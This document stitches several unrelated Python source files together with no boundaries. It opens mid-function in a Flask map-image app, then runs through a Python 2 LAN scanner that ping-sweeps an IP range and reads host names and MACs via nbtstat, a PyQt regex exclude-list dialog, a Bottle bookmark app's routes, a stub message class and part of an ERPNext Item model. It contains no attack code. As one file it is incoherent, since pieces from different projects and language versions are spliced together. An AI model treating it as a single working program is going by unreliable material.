        return redirect(url_for('error'))

    # Create response
    response = make_response(room_data)
    response.headers['Content-Type'] = content_type
    return response


@app.route("/map.svg", methods=['POST'])
def map_svg():
    return make_map(request, format='svg')


@app.route("/map.png", methods=['POST'])
def map_png():
    return make_map(request, format='png')


@app.route("/map.jpg", methods=['POST'])
def map_jpg():
    return make_map(request, format='jpg')


@app.route("/map", methods=['POST'])
def process():
    """ Process submitted form data. """
    format = request.form['format']

    try:
        node = {
            'png': 'map_png',
            'svg': 'map_svg',
            'jpg': 'map_jpg',
        }[format]
    except KeyError:
        flash("The output format you selected is not supported.")
        return redirect(url_for('error'))
    else:
        return redirect(url_for(node, _method='POST'), code=307)


def main():
    """ Parse arguments and get things going for the web interface """
    parser = argparse.ArgumentParser(description=HELP_TEXT)
    
    parser.add_argument(
        '-p', '--port',
        help="Port to serve the interface on.",
        type=int,
        default=5050
    )

    parser.add_argument(
        '-a', '--host',
        help="Host to server the interface on.",
    )

    args = parser.parse_args()

    app.run(port=args.port, host=args.host, debug=False)

import subprocess
import time
import sys
import re

class checkIfUp:
    __shellPings = []
    __shell2Nbst = []
    __ipsToCheck = []
    checkedIps = 0
    onlineIps = 0
    unreachable = 0
    timedOut = 0
    upIpsAddress = []
    computerName = []
    completeMacAddress = []
    executionTime = 0
    
    def __init__(self,fromIp,toIp):
        startTime = time.time()
        self.fromIp = fromIp # from 192.168.1.x
        self.toIp = toIp # to 192.168.x.x
        self.__checkIfIpIsValid(fromIp)
        self.__checkIfIpIsValid(toIp)
        self.__getRange(fromIp,toIp)
        self.__shellToQueue()
        #self.__checkIfUp() # run by the shellToQueue queue organizer
        self.__computerInfoInQueue()
        endTime = time.time()
        self.executionTime = round(endTime - startTime,3)
        
    def __checkIfIpIsValid(self,ip):
        def validateRange(val):
            # valid range => 1 <-> 255
            try:
                val = int(val)
                if val < 0 or val > 255:
                    print "Invalid IP Range ("+str(val)+")"
                    sys.exit(0)
            except:
                print "Invalid IP"
                sys.exit(0)
        ip = ip.split(".")
        firstVal = validateRange(ip[0])
        secondVal = validateRange(ip[1])
        thirdVal = validateRange(ip[2])
        fourthVal = validateRange(ip[3])
        return True
    
    def __getRange(self,fromIp,toIp):
        fromIp = fromIp.split(".")
        toIp = toIp.split(".")

        # toIp must be > fromIp
        def ip3chars(ipBlock):
            # input 1; output 001
            ipBlock = str(ipBlock)
            while len(ipBlock) != 3:
                ipBlock = "0"+ipBlock
            return ipBlock
        fromIpRaw = ip3chars(fromIp[0])+ip3chars(fromIp[1])+ip3chars(fromIp[2])+ip3chars(fromIp[3])
        toIpRaw = ip3chars(toIp[0])+ip3chars(toIp[1])+ip3chars(toIp[2])+ip3chars(toIp[3])
        if fromIpRaw > toIpRaw:
            # if from is bigger switch the order
            temp = fromIp
            fromIp = toIp
            toIp = temp

        currentIp = [0,0,0,0]
        # all to integers
        currentIp0 = int(fromIp[0])
        currentIp1 = int(fromIp[1])
        currentIp2 = int(fromIp[2])
        currentIp3 = int(fromIp[3])
        toIp0 = int(toIp[0])
        toIp1 = int(toIp[1])
        toIp2 = int(toIp[2])
        toIp3 = int(toIp[3])

        firstIp = str(currentIp0)+"."+str(currentIp1)+"."+str(currentIp2)+"."+str(currentIp3)
        self.__ipsToCheck = [firstIp]
        while currentIp3 != toIp3 or currentIp2 != toIp2 or currentIp1 != toIp1 or currentIp0 != toIp0:
            currentIp3 += 1
            if currentIp3 > 255:
                currentIp3 = 0
                currentIp2 += 1
                if currentIp2 > 255:
                    currentIp2 = 0
                    currentIp1 += 1
                    if currentIp1 > 255:
                        currentIp1 = 0
                        currentIp0 += 1
            addIp = str(currentIp0)+"."+str(currentIp1)+"."+str(currentIp2)+"."+str(currentIp3)
            self.__ipsToCheck.append(addIp)
        
    def __shellToQueue(self):
        # write them in the shell queue
        maxPingsAtOnce = 200
        currentQueuedPings = 0
        for pingIp in self.__ipsToCheck:
            proc = subprocess.Popen(['ping','-n','1',pingIp],stdout=subprocess.PIPE,shell=True)
            self.__shellPings.append(proc)
            currentQueuedPings += 1
            if currentQueuedPings >= maxPingsAtOnce:
                #execute shells
                self.__checkIfUp()
                currentQueuedPings = 0
                self.__shellPings = []
        self.__checkIfUp() # execute last queue
            
    def __checkIfUp(self):
        # execute the shells & determine whether the host is up or not
        for shellInQueue in self.__shellPings:
            pingResult = ""
            shellInQueue.wait()
            while True:
                line = shellInQueue.stdout.readline()
                if line != "":
                    pingResult += line
                else:
                    break;
            self.checkedIps += 1
            if 'unreachable' in pingResult:
                self.unreachable += 1
            elif 'timed out' in pingResult:
                self.timedOut += 1
            else:
                self.onlineIps += 1
                currentIp = self.__ipsToCheck[self.checkedIps-1]
                self.upIpsAddress.append(currentIp)

    def __computerInfoInQueue(self):
        # shell queue for online hosts
        maxShellsAtOnce = 255
        currentQueuedNbst = 0
        for onlineIp in self.upIpsAddress:
            proc = subprocess.Popen(['\\Windows\\sysnative\\nbtstat.exe','-a',onlineIp],stdout=subprocess.PIPE,shell=True)
            self.__shell2Nbst.append(proc)
            currentQueuedNbst += 1
            if currentQueuedNbst >= maxShellsAtOnce:
                # execute shells
                self.__gatherComputerInfo()
                currentQueuedNbst = 0
                self.__shell2Nbst = []
        self.__gatherComputerInfo() # execute last queue

    def __gatherComputerInfo(self):
        # execute the shells and find host Name and MAC
        for shellInQueue in self.__shell2Nbst:
            nbstResult = ""
            shellInQueue.wait()

            computerNameLine = ""
            macAddressLine = ""
            computerName = ""
            macAddress = ""
            while True:
                line = shellInQueue.stdout.readline()
                if line != "":
                    if '<00>' in line and 'UNIQUE' in line:
                        computerNameLine = line
                    if 'MAC Address' in line:
                        macAddressLine = line
                else:
                    break;
                
            computerName = re.findall('([ ]+)(.*?)([ ]+)<00>', computerNameLine)
            macAddress = re.findall('([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)',macAddressLine)
            try:
                self.computerName.append(computerName[0][1])
            except:
                self.computerName.append("")

            completeMacAddress = ""
            firstMacElement = 0
            try:
                for macEach in macAddress[0]:
                    if firstMacElement == 0:
                        firstMacElement += 1
                    else:
                        completeMacAddress += ":"
                    completeMacAddress += macEach
                firstMacElement = 0
            except:
                completeMacAddress = ""
            self.completeMacAddress.append(completeMacAddress)
                        
    def readValue(self):
        # debugging use only
        ips = []
        for ip in self.completeMacAddress:
            ips.append(ip)
        return ips

print "\t\t---LANScanner v1.0---\n"
# brief tutorial
print "Sample input data:"
print "FromIP: 192.168.1.50"
print "ToIP: 192.168.1.20"
print "---"
# input
fromIp = raw_input("From: ")
toIp = raw_input("To: ")
# enter values to class
userRange = checkIfUp(fromIp,toIp)
# read class values
print ""
#print userRange.readValue() # debugging use only
print "Checked",userRange.checkedIps,"IPs"
print ""
print "Online:",str(userRange.onlineIps)+"/"+str(userRange.checkedIps)
print "Unreachable:",userRange.unreachable,"Timed out:",userRange.timedOut
print "" # newline
print "Online IPs:"
print "IP\t\tNAME\t\tMAC"
counter = 0
for onlineIp in userRange.upIpsAddress:
    print onlineIp+"\t"+userRange.computerName[counter]+"\t"+userRange.completeMacAddress[counter]
    counter += 1
print ""
print "Took",userRange.executionTime,"seconds"
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html

import re
from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtWidgets import (
    QPushButton,
    QLineEdit,
    QVBoxLayout,
    QGridLayout,
    QDialog,
    QTableView,
    QAbstractItemView,
    QSpacerItem,
    QSizePolicy,
    QHeaderView,
)
from .exclude_list_table import ExcludeListTable

from core.exclude import AlreadyThereException
from hscommon.trans import trget

tr = trget("ui")


class ExcludeListDialog(QDialog):
    def __init__(self, app, parent, model, **kwargs):
        flags = Qt.CustomizeWindowHint | Qt.WindowTitleHint | Qt.WindowSystemMenuHint
        super().__init__(parent, flags, **kwargs)
        self.app = app
        self.specific_actions = frozenset()
        self._setupUI()
        self.model = model  # ExcludeListDialogCore
        self.model.view = self
        self.table = ExcludeListTable(app, view=self.tableView)  # Qt ExcludeListTable
        self._row_matched = False  # test if at least one row matched our test string
        self._input_styled = False

        self.buttonAdd.clicked.connect(self.addStringFromLineEdit)
        self.buttonRemove.clicked.connect(self.removeSelected)
        self.buttonRestore.clicked.connect(self.restoreDefaults)
        self.buttonClose.clicked.connect(self.accept)
        self.buttonHelp.clicked.connect(self.display_help_message)
        self.buttonTestString.clicked.connect(self.onTestStringButtonClicked)
        self.inputLine.textEdited.connect(self.reset_input_style)
        self.testLine.textEdited.connect(self.reset_input_style)
        self.testLine.textEdited.connect(self.reset_table_style)

    def _setupUI(self):
        layout = QVBoxLayout(self)
        gridlayout = QGridLayout()
        self.buttonAdd = QPushButton(tr("Add"))
        self.buttonRemove = QPushButton(tr("Remove Selected"))
        self.buttonRestore = QPushButton(tr("Restore defaults"))
        self.buttonTestString = QPushButton(tr("Test string"))
        self.buttonClose = QPushButton(tr("Close"))
        self.buttonHelp = QPushButton(tr("Help"))
        self.inputLine = QLineEdit()
        self.testLine = QLineEdit()
        self.tableView = QTableView()
        triggers = (
            QAbstractItemView.DoubleClicked | QAbstractItemView.EditKeyPressed | QAbstractItemView.SelectedClicked
        )
        self.tableView.setEditTriggers(triggers)
        self.tableView.setSelectionMode(QTableView.ExtendedSelection)
        self.tableView.setSelectionBehavior(QTableView.SelectRows)
        self.tableView.setShowGrid(False)
        vheader = self.tableView.verticalHeader()
        vheader.setSectionsMovable(True)
        vheader.setVisible(False)
        hheader = self.tableView.horizontalHeader()
        hheader.setSectionsMovable(False)
        hheader.setSectionResizeMode(QHeaderView.Fixed)
        hheader.setStretchLastSection(True)
        hheader.setHighlightSections(False)
        hheader.setVisible(True)
        gridlayout.addWidget(self.inputLine, 0, 0)
        gridlayout.addWidget(self.buttonAdd, 0, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonRemove, 1, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonRestore, 2, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonHelp, 3, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonClose, 4, 1)
        gridlayout.addWidget(self.tableView, 1, 0, 6, 1)
        gridlayout.addItem(QSpacerItem(0, 0, QSizePolicy.Minimum, QSizePolicy.Expanding), 4, 1)
        gridlayout.addWidget(self.buttonTestString, 6, 1)
        gridlayout.addWidget(self.testLine, 6, 0)

        layout.addLayout(gridlayout)
        self.inputLine.setPlaceholderText(tr("Type a python regular expression here..."))
        self.inputLine.setFocus()
        self.testLine.setPlaceholderText(tr("Type a file system path or filename here..."))
        self.testLine.setClearButtonEnabled(True)

    # --- model --> view
    def show(self):
        super().show()
        self.inputLine.setFocus()

    @pyqtSlot()
    def addStringFromLineEdit(self):
        text = self.inputLine.text()
        if not text:
            return
        try:
            self.model.add(text)
        except AlreadyThereException:
            self.app.show_message("Expression already in the list.")
            return
        except Exception as e:
            self.app.show_message(f"Expression is invalid: {e}")
            return
        self.inputLine.clear()

    def removeSelected(self):
        self.model.remove_selected()

    def restoreDefaults(self):
        self.model.restore_defaults()

    def onTestStringButtonClicked(self):
        input_text = self.testLine.text()
        if not input_text:
            self.reset_input_style()
            return
        # If at least one row matched, we know whether table is highlighted or not
        self._row_matched = self.model.test_string(input_text)
        self.table.refresh()

        # Test the string currently in the input text box as well
        input_regex = self.inputLine.text()
        if not input_regex:
            self.reset_input_style()
            return
        compiled = None
        try:
            compiled = re.compile(input_regex)
        except re.error:
            self.reset_input_style()
            return
        if self.model.is_match(input_text, compiled):
            self.inputLine.setStyleSheet("background-color: rgb(10, 200, 10);")
            self._input_styled = True
        else:
            self.reset_input_style()

    def reset_input_style(self):
        """Reset regex input line background"""
        if self._input_styled:
            self.inputLine.setStyleSheet(self.styleSheet())
            self._input_styled = False

    def reset_table_style(self):
        if self._row_matched:
            self._row_matched = False
            self.model.reset_rows_highlight()
        self.table.refresh()

    def display_help_message(self):
        self.app.show_message(
            tr(
                """\
These (case sensitive) python regular expressions will filter out files during scans.<br>\
Directores will also have their <strong>default state</strong> set to Excluded \
in the Directories tab if their name happens to match one of the selected regular expressions.<br>\
For each file collected, two tests are performed to determine whether or not to completely ignore it:<br>\
<li>1. Regular expressions with no path separator in them will be compared to the file name only.</li>
<li>2. Regular expressions with at least one path separator in them will be compared to the full path to the file.</li><br>
Example: if you want to filter out .PNG files from the "My Pictures" directory only:<br>\
<code>.*My\\sPictures\\\\.*\\.png</code><br><br>\
You can test the regular expression with the "test string" button after pasting a fake path in the test field:<br>\
<code>C:\\\\User\\My Pictures\\test.png</code><br><br>
Matching regular expressions will be highlighted.<br>\
If there is at least one highlight, the path or filename tested will be ignored during scans.<br><br>\
Directories and files starting with a period '.' are filtered out by default.<br><br>"""
            )
        )

from bottle import route, template, error, request, static_file, get, post
from index import get_index
from bmarks import get_bmarks
from tags import get_tags
from add import add_tags
from bmarklet import get_bmarklet
from account import get_account
from edit_tags import get_edit_tags
from importbm import get_import_bm
from edit import do_edit
from login import do_login
from register import do_register

@route('/')
def myroot():
    return_data = get_index()
    return return_data

@route('/account', method=['GET', 'POST'])
def bmarks():
    return_data = get_bmarklet()
    return return_data

@route('/add', method=['GET', 'POST'])
def bmarks():
    return_data = add_tags()
    return return_data

@route('/bmarklet')
def bmarks():
    return_data = get_bmarklet()
    return return_data

@route('/bmarks')
def bmarks():
    return_data = get_bmarks()
    return return_data

@route('/edit', method=['GET', 'POST'])
def bmarks():
    return_data = do_edit()
    return return_data

@route('/edit_tags', method=['GET', 'POST'])
def bmarks():
    return_data = get_edit_tags()
    return return_data

@route('/import', method=['GET', 'POST'])
def bmarks():
    return_data = get_import_bm()
    return return_data

@route('/login', method=['GET', 'POST'])
def bmarks():
    return_data = do_login()
    return return_data

@route('/register', method=['GET', 'POST'])
def bmarks():
    return_data = do_register()
    return return_data

@route('/tags')
def bmarks():
    return_data = get_tags()
    return return_data

# serve css
@get('/<filename:re:.*\.css>')
def send_css(filename):
    return static_file(filename, root='css')

# serve javascript
@get('/<filename:re:.*\.js>')
def send_js(filename):
    return static_file(filename, root='js')

# serve images
@get('<filename:re:.*\.png>')
def send_img(filename):
    return static_file(filename, root='images')

# serve fonts
@get('<filename:re:.*\.(woff|woff2)>')
def send_font(filename):
    return static_file(filename, root='fonts')

@error(404)
def handle404(error):
    return '<H1>Ooops, its not here<BR>'

@error(500)
def handle500(error):
    return '<H1>Oops, its broken:&nbsp;{}<BR>'.format(error)

#!/usr/bin/env python

class Message(object):
    """
        Base type of a message sent through the pipeline.
        Define some attributes and methods to form your message.

        I suggest you don't alter this class. You're are free to do so, of course. It's your own decision.
        Though, I suggest you create your own message type and let it inherit from this class.
    """
    pass

# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt

from __future__ import unicode_literals

import itertools
import json
import erpnext
import frappe
import copy
from erpnext.controllers.item_variant import (ItemVariantExistsError,
		copy_attributes_to_variant, get_variant, make_variant_item_code, validate_item_variant_attributes)
from erpnext.setup.doctype.item_group.item_group import (get_parent_item_groups, invalidate_cache_for)
from frappe import _, msgprint
from frappe.utils import (cint, cstr, flt, formatdate, get_timestamp, getdate,
						  now_datetime, random_string, strip)
from frappe.utils.html_utils import clean_html
from frappe.website.doctype.website_slideshow.website_slideshow import \
	get_slideshow

from frappe.website.render import clear_cache
from frappe.website.website_generator import WebsiteGenerator

from six import iteritems


class DuplicateReorderRows(frappe.ValidationError):
	pass


class StockExistsForTemplate(frappe.ValidationError):
	pass


class InvalidBarcode(frappe.ValidationError):
	pass


class Item(WebsiteGenerator):
	website = frappe._dict(
		page_title_field="item_name",
		condition_field="show_in_website",
		template="templates/generators/item.html",
		no_cache=1
	)

	def onload(self):
		super(Item, self).onload()

		self.set_onload('stock_exists', self.stock_ledger_created())
		self.set_asset_naming_series()

	def set_asset_naming_series(self):
		if not hasattr(self, '_asset_naming_series'):
			from erpnext.assets.doctype.asset.asset import get_asset_naming_series
			self._asset_naming_series = get_asset_naming_series()

		self.set_onload('asset_naming_series', self._asset_naming_series)

	def autoname(self):
		if frappe.db.get_default("item_naming_by") == "Naming Series":
			if self.variant_of:
				if not self.item_code:
					template_item_name = frappe.db.get_value("Item", self.variant_of, "item_name")
					self.item_code = make_variant_item_code(self.variant_of, template_item_name, self)
			else:
				from frappe.model.naming import set_name_by_naming_series
				set_name_by_naming_series(self)
				self.item_code = self.name

		self.item_code = strip(self.item_code)
		self.name = self.item_code

	def before_insert(self):
		if not self.description:
			self.description = self.item_name

		# if self.is_sales_item and not self.get('is_item_from_hub'):
		# 	self.publish_in_hub = 1

	def after_insert(self):
		'''set opening stock and item price'''
		if self.standard_rate:
			for default in self.item_defaults:
				self.add_price(default.default_price_list)

		if self.opening_stock:
			self.set_opening_stock()

	def validate(self):
		self.get_doc_before_save()

		super(Item, self).validate()

		if not self.item_name:
			self.item_name = self.item_code

		if not self.description:
			self.description = self.item_name

		self.validate_uom()
		self.validate_description()
		self.add_default_uom_in_conversion_factor_table()
		self.validate_conversion_factor()
		self.validate_item_type()
		self.check_for_active_boms()
		self.fill_customer_code()
		self.check_item_tax()
		self.validate_barcode()
		self.validate_warehouse_for_reorder()
		self.update_bom_item_desc()
		self.synced_with_hub = 0

		self.validate_has_variants()
		self.validate_stock_exists_for_template_item()
		self.validate_attributes()
		self.validate_variant_attributes()
		self.validate_variant_based_on_change()
		self.validate_website_image()
		self.make_thumbnail()
		self.validate_fixed_asset()
		self.validate_retain_sample()
		self.validate_uom_conversion_factor()
		self.validate_item_defaults()
		self.update_defaults_from_item_group()
		self.validate_stock_for_has_batch_and_has_serial()

		if not self.get("__islocal"):
			self.old_item_group = frappe.db.get_value(self.doctype, self.name, "item_group")
			self.old_website_item_groups = frappe.db.sql_list("""select item_group
					from `tabWebsite Item Group`
					where parentfield='website_item_groups' and parenttype='Item' and parent=%s""", self.name)

	def on_update(self):
		invalidate_cache_for_item(self)
		self.validate_name_with_item_group()
		self.update_variants()
		self.update_item_price()
		self.update_template_item()

	def validate_description(self):
		'''Clean HTML description if set'''
		if cint(frappe.db.get_single_value('Stock Settings', 'clean_description_html')):
			self.description = clean_html(self.description)

	def add_price(self, price_list=None):
		'''Add a new price'''
		if not price_list:
			price_list = (frappe.db.get_single_value('Selling Settings', 'selling_price_list')
						or frappe.db.get_value('Price List', _('Standard Selling')))
		if price_list:
			item_price = frappe.get_doc({
				"doctype": "Item Price",
				"price_list": price_list,
				"item_code": self.name,
				"currency": erpnext.get_default_currency(),
				"price_list_rate": self.standard_rate
			})
			item_price.insert()

	def set_opening_stock(self):
		'''set opening stock'''
		if not self.is_stock_item or self.has_serial_no or self.has_batch_no:
			return

		if not self.valuation_rate and self.standard_rate:
			self.valuation_rate = self.standard_rate

		if not self.valuation_rate:
			frappe.throw(_("Valuation Rate is mandatory if Opening Stock entered"))

		from erpnext.stock.doctype.stock_entry.stock_entry_utils import make_stock_entry

		# default warehouse, or Stores
		for default in self.item_defaults:
			default_warehouse = (default.default_warehouse
					or frappe.db.get_single_value('Stock Settings', 'default_warehouse')
					or frappe.db.get_value('Warehouse', {'warehouse_name': _('Stores')}))

			if default_warehouse:
				stock_entry = make_stock_entry(item_code=self.name, target=default_warehouse, qty=self.opening_stock,
												rate=self.valuation_rate, company=default.company)

				stock_entry.add_comment("Comment", _("Opening Stock"))

	def make_route(self):
		if not self.route:
			return cstr(frappe.db.get_value('Item Group', self.item_group,
					'route')) + '/' + self.scrub((self.item_name if self.item_name else self.item_code) + '-' + random_string(5))

	def validate_website_image(self):
		if frappe.flags.in_import:
			return

		"""Validate if the website image is a public file"""
		auto_set_website_image = False
		if not self.website_image and self.image:
			auto_set_website_image = True
			self.website_image = self.image

		if not self.website_image:
			return

		# find if website image url exists as public
		file_doc = frappe.get_all("File", filters={
			"file_url": self.website_image
		}, fields=["name", "is_private"], order_by="is_private asc", limit_page_length=1)

		if file_doc:
			file_doc = file_doc[0]

		if not file_doc:
			if not auto_set_website_image:
				frappe.msgprint(_("Website Image {0} attached to Item {1} cannot be found").format(self.website_image, self.name))

			self.website_image = None

		elif file_doc.is_private:
			if not auto_set_website_image:
				frappe.msgprint(_("Website Image should be a public file or website URL"))

			self.website_image = None

	def make_thumbnail(self):
		if frappe.flags.in_import:
			return

		"""Make a thumbnail of `website_image`"""
		import requests.exceptions

		if not self.is_new() and self.website_image != frappe.db.get_value(self.doctype, self.name, "website_image"):
			self.thumbnail = None

		if self.website_image and not self.thumbnail:
			file_doc = None

			try:
				file_doc = frappe.get_doc("File", {
					"file_url": self.website_image,
					"attached_to_doctype": "Item",
					"attached_to_name": self.name
				})
			except frappe.DoesNotExistError:
				pass
				# cleanup
				frappe.local.message_log.pop()

			except requests.exceptions.HTTPError:
				frappe.msgprint(_("Warning: Invalid attachment {0}").format(self.website_image))
				self.website_image = None

			except requests.exceptions.SSLError:
				frappe.msgprint(
					_("Warning: Invalid SSL certificate on attachment {0}").format(self.website_image))
				self.website_image = None

			# for CSV import
			if self.website_image and not file_doc:
				try:
					file_doc = frappe.get_doc({
						"doctype": "File",
						"file_url": self.website_image,
						"attached_to_doctype": "Item",
						"attached_to_name": self.name
					}).insert()

				except IOError:
					self.website_image = None

			if file_doc:
				if not file_doc.thumbnail_url:
					file_doc.make_thumbnail()

				self.thumbnail = file_doc.thumbnail_url

	def validate_fixed_asset(self):
		if self.is_fixed_asset:
			if self.is_stock_item:
				frappe.throw(_("Fixed Asset Item must be a non-stock item."))

			if not self.asset_category:
				frappe.throw(_("Asset Category is mandatory for Fixed Asset item"))

			if self.stock_ledger_created():
				frappe.throw(_("Cannot be a fixed asset item as Stock Ledger is created."))

		if not self.is_fixed_asset:
			asset = frappe.db.get_all("Asset", filters={"item_code": self.name, "docstatus": 1}, limit=1)
			if asset:
				frappe.throw(_('"Is Fixed Asset" cannot be unchecked, as Asset record exists against the item'))

	def validate_retain_sample(self):
		if self.retain_sample and not frappe.db.get_single_value('Stock Settings', 'sample_retention_warehouse'):
			frappe.throw(_("Please select Sample Retention Warehouse in Stock Settings first"))
		if self.retain_sample and not self.has_batch_no:
			frappe.throw(_(" {0} Retain Sample is based on batch, please check Has Batch No to retain sample of item").format(
				self.item_code))

	def get_context(self, context):
		context.show_search = True
		context.search_link = '/product_search'

		context.parents = get_parent_item_groups(self.item_group)

		self.set_variant_context(context)
		self.set_attribute_context(context)
		self.set_disabled_attributes(context)

		return context

	def set_variant_context(self, context):
		if self.has_variants:
			context.no_cache = True

			# load variants
			# also used in set_attribute_context
			context.variants = frappe.get_all("Item",
				 filters={"variant_of": self.name, "show_variant_in_website": 1},
				 order_by="name asc")

			variant = frappe.form_dict.variant
			if not variant and context.variants:
				# the case when the item is opened for the first time from its list
				variant = context.variants[0]

			if variant:
				context.variant = frappe.get_doc("Item", variant)

				for fieldname in ("website_image", "web_long_description", "description",
										"website_specifications"):
					if context.variant.get(fieldname):
						value = context.variant.get(fieldname)
						if isinstance(value, list):
							value = [d.as_dict() for d in value]

						context[fieldname] = value

		if self.slideshow:
			if context.variant and context.variant.slideshow:
				context.update(get_slideshow(context.variant))
			else:
				context.update(get_slideshow(self))

	def set_attribute_context(self, context):
		if self.has_variants:
			attribute_values_available = {}
			context.attribute_values = {}
			context.selected_attributes = {}

			# load attributes
			for v in context.variants:
				v.attributes = frappe.get_all("Item Variant Attribute",
					  fields=["attribute", "attribute_value"],
					  filters={"parent": v.name})

				for attr in v.attributes:
					values = attribute_values_available.setdefault(attr.attribute, [])
					if attr.attribute_value not in values:
						values.append(attr.attribute_value)

					if v.name == context.variant.name:
						context.selected_attributes[attr.attribute] = attr.attribute_value

			# filter attributes, order based on attribute table
			for attr in self.attributes:
				values = context.attribute_values.setdefault(attr.attribute, [])

				if cint(frappe.db.get_value("Item Attribute", attr.attribute, "numeric_values")):
					for val in sorted(attribute_values_available.get(attr.attribute, []), key=flt):
						values.append(val)

				else:
					# get list of values defined (for sequence)
					for attr_value in frappe.db.get_all("Item Attribute Value",
						fields=["attribute_value"],
						filters={"parent": attr.attribute}, order_by="idx asc"):

						if attr_value.attribute_value in attribute_values_available.get(attr.attribute, []):
							values.append(attr_value.attribute_value)

			context.variant_info = json.dumps(context.variants)

	def set_disabled_attributes(self, context):
		"""Disable selection options of attribute combinations that do not result in a variant"""
		if not self.attributes or not self.has_variants:
			return

		context.disabled_attributes = {}
		attributes = [attr.attribute for attr in self.attributes]

		def find_variant(combination):
			for variant in context.variants:
				if len(variant.attributes) < len(attributes):
					continue

				if "combination" not in variant:
					ref_combination = []

					for attr in variant.attributes:
						idx = attributes.index(attr.attribute)
						ref_combination.insert(idx, attr.attribute_value)

					variant["combination"] = ref_combination

				if not (set(combination) - set(variant["combination"])):
					# check if the combination is a subset of a variant combination
					# eg. [Blue, 0.5] is a possible combination if exists [Blue, Large, 0.5]
					return True

		for i, attr in enumerate(self.attributes):
			if i == 0:
				continue

			combination_source = []

			# loop through previous attributes
			for prev_attr in self.attributes[:i]:
				combination_source.append([context.selected_attributes.get(prev_attr.attribute)])

			combination_source.append(context.attribute_values[attr.attribute])

			for combination in itertools.product(*combination_source):
				if not find_variant(combination):
					context.disabled_attributes.setdefault(attr.attribute, []).append(combination[-1])

	def add_default_uom_in_conversion_factor_table(self):
		uom_conv_list = [d.uom for d in self.get("uoms")]
		if self.stock_uom not in uom_conv_list:
			ch = self.append('uoms', {})
			ch.uom = self.stock_uom
			ch.conversion_factor = 1

		to_remove = []
		for d in self.get("uoms"):
			if d.conversion_factor == 1 and d.uom != self.stock_uom:
				to_remove.append(d)

		[self.remove(d) for d in to_remove]

	def update_template_tables(self):
		template = frappe.get_doc("Item", self.variant_of)

		# add item taxes from template
		for d in template.get("taxes"):
			self.append("taxes", {"tax_type": d.tax_type, "tax_rate": d.tax_rate})

		# copy re-order table if empty
		if not self.get("reorder_levels"):
			for d in template.get("reorder_levels"):
				n = {}
				for k in ("warehouse", "warehouse_reorder_level",
					"warehouse_reorder_qty", "material_request_type"):
					n[k] = d.get(k)
				self.append("reorder_levels", n)

	def validate_conversion_factor(self):
		check_list = []
		for d in self.get('uoms'):
			if cstr(d.uom) in check_list:
				frappe.throw(
					_("Unit of Measure {0} has been entered more than once in Conversion Factor Table").format(d.uom))
			else:
				check_list.append(cstr(d.uom))

			if d.uom and cstr(d.uom) == cstr(self.stock_uom) and flt(d.conversion_factor) != 1:
				frappe.throw(
					_("Conversion factor for default Unit of Measure must be 1 in row {0}").format(d.idx))

	def validate_item_type(self):
		if self.has_serial_no == 1 and self.is_stock_item == 0 and not self.is_fixed_asset:
			msgprint(_("'Has Serial No' can not be 'Yes' for non-stock item"), raise_exception=1)

		if self.has_serial_no == 0 and self.serial_no_series:
			self.serial_no_series = None

	def check_for_active_boms(self):
		if self.default_bom:
			bom_item = frappe.db.get_value("BOM", self.default_bom, "item")
			if bom_item not in (self.name, self.variant_of):
				frappe.throw(
					_("Default BOM ({0}) must be active for this item or its template").format(bom_item))

	def fill_customer_code(self):
		""" Append all the customer codes and insert into "customer_code" field of item table """
		cust_code = []
		for d in self.get('customer_items'):
			cust_code.append(d.ref_code)
		self.customer_code = ','.join(cust_code)

	def check_item_tax(self):
		"""Check whether Tax Rate is not entered twice for same Tax Type"""
		check_list = []
		for d in self.get('taxes'):
			if d.tax_type:
				account_type = frappe.db.get_value("Account", d.tax_type, "account_type")

				if account_type not in ['Tax', 'Chargeable', 'Income Account', 'Expense Account']:
					frappe.throw(
						_("Item Tax Row {0} must have account of type Tax or Income or Expense or Chargeable").format(d.idx))
				else:
					if d.tax_type in check_list:
						frappe.throw(_("{0} entered twice in Item Tax").format(d.tax_type))
					else:
						check_list.append(d.tax_type)

	def validate_barcode(self):
		from stdnum import ean
		if len(self.barcodes) > 0:
			for item_barcode in self.barcodes:
				options = frappe.get_meta("Item Barcode").get_options("barcode_type").split('\n')
				if item_barcode.barcode:
					duplicate = frappe.db.sql(
						"""select parent from `tabItem Barcode` where barcode = %s and parent != %s""", (item_barcode.barcode, self.name))
					if duplicate:
						frappe.throw(_("Barcode {0} already used in Item {1}").format(
							item_barcode.barcode, duplicate[0][0]), frappe.DuplicateEntryError)

					item_barcode.barcode_type = "" if item_barcode.barcode_type not in options else item_barcode.barcode_type
					if item_barcode.barcode_type and item_barcode.barcode_type.upper() in ('EAN', 'UPC-A', 'EAN-13', 'EAN-8'):
						if not ean.is_valid(item_barcode.barcode):
							frappe.throw(_("Barcode {0} is not a valid {1} code").format(
								item_barcode.barcode, item_barcode.barcode_type), InvalidBarcode)

	def validate_warehouse_for_reorder(self):
		'''Validate Reorder level table for duplicate and conditional mandatory'''
		warehouse = []
		for d in self.get("reorder_levels"):
			if not d.warehouse_group:
				d.warehouse_group = d.warehouse
			if d.get("warehouse") and d.get("warehouse") not in warehouse:
				warehouse += [d.get("warehouse")]
			else:
				frappe.throw(_("Row {0}: An Reorder entry already exists for this warehouse {1}")
									.format(d.idx, d.warehouse), DuplicateReorderRows)

			if d.warehouse_reorder_level and not d.warehouse_reorder_qty:
				frappe.throw(_("Row #{0}: Please set reorder quantity").format(d.idx))

	def stock_ledger_created(self):
		if not hasattr(self, '_stock_ledger_created'):
			self._stock_ledger_created = len(frappe.db.sql("""select name from `tabStock Ledger Entry`
				where item_code = %s limit 1""", self.name))
		return self._stock_ledger_created

	def validate_name_with_item_group(self):
		# causes problem with tree build
		if frappe.db.exists("Item Group", self.name):
			frappe.throw(
				_("An Item Group exists with same name, please change the item name or rename the item group"))

	def update_item_price(self):
		frappe.db.sql("""update `tabItem Price` set item_name=%s,
			item_description=%s, brand=%s where item_code=%s""",
					(self.item_name, self.description, self.brand, self.name))

